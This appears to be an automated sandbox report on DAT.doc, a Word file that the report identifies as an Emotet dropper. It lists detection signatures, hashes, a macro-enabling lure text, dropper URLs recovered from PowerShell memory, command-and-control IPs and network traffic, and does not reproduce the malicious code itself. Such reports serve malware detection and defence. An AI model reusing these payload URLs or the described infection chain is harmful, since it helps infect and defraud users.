Analysis Report DAT.doc

Overview

General Information

Sample Name:	DAT.doc
Analysis ID:	344355
MD5:	6792d7fd9d2f9237cd31d1234edcec03
SHA1:	af8329cc3d379f678aac5f2a1b83a7697dd190af
SHA256:	55f177ec4613b1b03a37199e3c7d49336dd424a66737f79005208aa9883b192b
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Potential dropper URLs found in powershell memory

PowerShell case anomaly found

Powershell drops PE file

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to delete services

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: https://johnhaydenwrites.com/track_url/P/	Avira URL Cloud: Label: malware
Source: https://nahlasolimandesigns.com/nahla3/d/	Avira URL Cloud: Label: malware
Source: https://vietnhabienhoa.com/wordpress/QUTy/P	Avira URL Cloud: Label: malware
Source: http://hbprivileged.com/cgi-bin/kcggF/	Avira URL Cloud: Label: malware
Source: http://zenithcampus.com/l/yQ/	Avira URL Cloud: Label: malware
Source: https://football-eg.com/web_map/n/	Avira URL Cloud: Label: malware
Source: https://vietnhabienhoa.com/wordpress/QUTy/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll	Metadefender: Detection: 56%			Perma Link
Source: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll	ReversingLabs: Detection: 75%

Multi AV Scanner detection for submitted file

Source: DAT.doc	Virustotal: Detection: 71%			Perma Link
Source: DAT.doc	ReversingLabs: Detection: 82%

Machine Learning detection for dropped file

Source: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll

Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_0020A69B CryptDecodeObjectEx,

20_2_0020A69B

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: <ystem.pdbF source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2139174857.0000000002380000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_002075F0 FindFirstFileW,

20_2_002075F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: zenithcampus.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49172 -> 167.71.148.58:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 35.200.206.198:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49169 -> 184.66.18.83:80
Source: Traffic	Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.22:49172 -> 167.71.148.58:443

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: http://zenithcampus.com/l/yQ/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: http://hbprivileged.com/cgi-bin/kcggF/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: http://localaffordableroofer.com/ralphs-receipt-f2uhf/qTT5DC/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: https://johnhaydenwrites.com/track_url/P/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: https://nahlasolimandesigns.com/nahla3/d/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: https://football-eg.com/web_map/n/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in memory: https://vietnhabienhoa.com/wordpress/QUTy/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /l/yQ/ HTTP/1.1Host: zenithcampus.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ralphs-receipt-f2uhf/qTT5DC/ HTTP/1.1Host: localaffordableroofer.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 167.71.148.58 167.71.148.58

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View	ASN Name: TTNET-MYTIMEdotComBerhadMY TTNET-MYTIMEdotComBerhadMY

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: POST /um49al9zetvy1g5wmnt/twmd2l9pj/0k1iudym/ag1m0i31pvl6lis/m8khm/21qx1r3lmxejnl/ HTTP/1.1DNT: 0Referer: 167.71.148.58/um49al9zetvy1g5wmnt/twmd2l9pj/0k1iudym/ag1m0i31pvl6lis/m8khm/21qx1r3lmxejnl/Content-Type: multipart/form-data; boundary=-----------------------z2vqH5ZpSVZftRl6dB758VDUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 5908Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown	TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: unknown	TCP traffic detected without corresponding DNS query: 167.71.148.58

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_0020280B InternetReadFile,

20_2_0020280B

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BCD45F3-025D-4403-9DBE-B492A11253DC}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /l/yQ/ HTTP/1.1Host: zenithcampus.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ralphs-receipt-f2uhf/qTT5DC/ HTTP/1.1Host: localaffordableroofer.comConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: zenithcampus.com

Source: unknown

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3 (Ubuntu)Date: Tue, 26 Jan 2021 12:48:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-transform, no-cache, no-store, must-revalidateLink: <https://zenithcampus.com/wp-json/>; rel="https://api.w.org/"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: http://hbprivileged.com/cgi-bin/kcggF/
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2141813649.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: http://localaffordableroofer.com
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: http://localaffordableroofer.com/ralphs-receipt-f2uhf/qTT5DC/
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2139305270.0000000002470000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2143212470.0000000002770000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2144888495.0000000002780000.00000002.00000001.sdmp, rundll32.exe, 00000012.00000002.2164826084.0000000002860000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2139305270.0000000002470000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2143212470.0000000002770000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2144888495.0000000002780000.00000002.00000001.sdmp, rundll32.exe, 00000012.00000002.2164826084.0000000002860000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2146720602.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140682913.0000000001F97000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2143404795.00000000020A7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/cclea
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp	String found in binary or memory: http://zenithcampus.com
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: http://zenithcampus.com/l/yQ/
Source: powershell.exe, 00000005.00000002.2141813649.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: https://api.w.org/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: https://football-eg.com/web_map/n/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: https://johnhaydenwrites.com/track_url/P/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: https://nahlasolimandesigns.com/nahla3/d/
Source: powershell.exe, 00000005.00000002.2144577407.0000000003AC2000.00000004.00000001.sdmp	String found in binary or memory: https://vietnhabienhoa.com/wordpress/QUTy/
Source: powershell.exe, 00000005.00000002.2140062239.0000000002CC6000.00000004.00000001.sdmp	String found in binary or memory: https://vietnhabienhoa.com/wordpress/QUTy/P
Source: powershell.exe, 00000005.00000002.2141813649.00000000031C0000.00000004.00000001.sdmp	String found in binary or memory: https://zenithcampus.com/wp-json/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 0000000F.00000002.2153905031.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2155916188.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2150770541.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2147679834.0000000000311000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2162568948.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2141920127.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2159102288.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2358984806.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2155772363.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2157336614.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2143541090.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2143576393.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2147601789.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2150877098.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2141994054.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2162462473.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2149091905.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2146032293.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2359036210.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2150116994.00000000004A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2146169134.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2153961508.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2152298877.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2158760347.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 18.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.4a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.310000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll

Jump to dropped file

Very long command line found

Source: unknown	Process created: Commandline size = 7696
Source: unknown	Process created: Commandline size = 7605
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 7605	Jump to behavior

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
